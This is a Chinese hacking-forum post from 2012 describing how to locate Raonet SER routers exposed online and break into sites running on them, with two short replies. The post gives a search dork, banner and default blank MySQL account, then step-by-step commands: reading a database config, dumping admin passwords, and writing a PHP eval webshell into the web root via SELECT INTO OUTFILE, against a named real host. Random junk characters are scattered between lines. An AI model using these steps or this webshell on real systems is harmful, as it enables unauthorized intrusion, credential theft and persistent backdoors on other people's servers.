中国网络渗透测试联盟
标题:
利用某路由器漏洞入侵国外站点
[打印本页]
作者:
admin
时间:
2012-12-10 10:30
标题:
利用某路由器漏洞入侵国外站点
寻找存在漏洞的路由器方法:
3 D& f1 s: s* M/ p3 P
! K! v) B, E3 S: N# G0 g
1:google搜索'Raonet Subscriber Ethernet Router'
5 j( f5 c# Z% v0 x, U
5 G2 e$ T- P" L
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
4 _; M# C0 i8 C" ~8 h+ `
+ g8 m9 D8 E0 a1 ~1 ^* M
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
$ `8 Y; g6 r) L3 c' N2 G" \3 ~# @
* M) l) c* a6 a% I( n
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
5 {) ?0 e7 P6 ^9 l z' `1 |- k
0 Q# Y2 B( W" P$ w. M
5 `- |0 c* d9 s, S/ l
9 m O2 W/ v! R
入侵步骤:
) B/ r3 {, B) V: ^/ ^7 o0 Y$ ^& B, A
, X' i7 s+ M s. b
1.爆web路径,
http://www.yu1u.org/src/jpgraph_line.php
0 g4 Z5 f1 r3 K2 J& p" {
* }- O" L( @$ }
2:查看数据库配置文件,
http://www.yu1u.org/inc/conn_db.inc
! [1 W/ ]! ]. ?; w
3:得到密码后连接,查看GUI管理密码:
0 p: a( G% t: n) Y+ \0 L2 a
use ser_500
8 q/ ?2 v+ B3 Q, K: L" d
select id,passwd from user;
* n+ a1 p, X! l1 ?
4:通过数据库写入webshell,执行命令:
5 ?: K5 B3 B: v$ o- \4 G1 m* p. d
use mysql;
+ ~8 k2 \ p* X& A$ M: `& o" s2 K3 n4 A
create table ok(cmd TEXT);
3 A6 X* Y1 p* _
insert into ok values("<?php @eval($_POST[cmd])?>");
7 o5 h: H& T5 R
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
& Q2 x2 _0 M9 V, @
drop table ok;
" I5 |3 y7 D4 l8 R0 V
: ?1 d/ M0 V0 m2 W( O5 c2 [
5:连接后门shell.php
7 E/ F8 m" ^5 c+ T$ u, F: @6 h
+ Y* {( {* z3 g! _
6. 搞定!
5 @' a2 i5 x- E* L
, B$ ~0 y! A" j& B) e
作者:
Anthony~
时间:
2013-7-27 20:06
这个后果可以很严重的说
作者:
jos666
时间:
2013-7-29 12:07
不错哦,黑服务器补洞。。
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2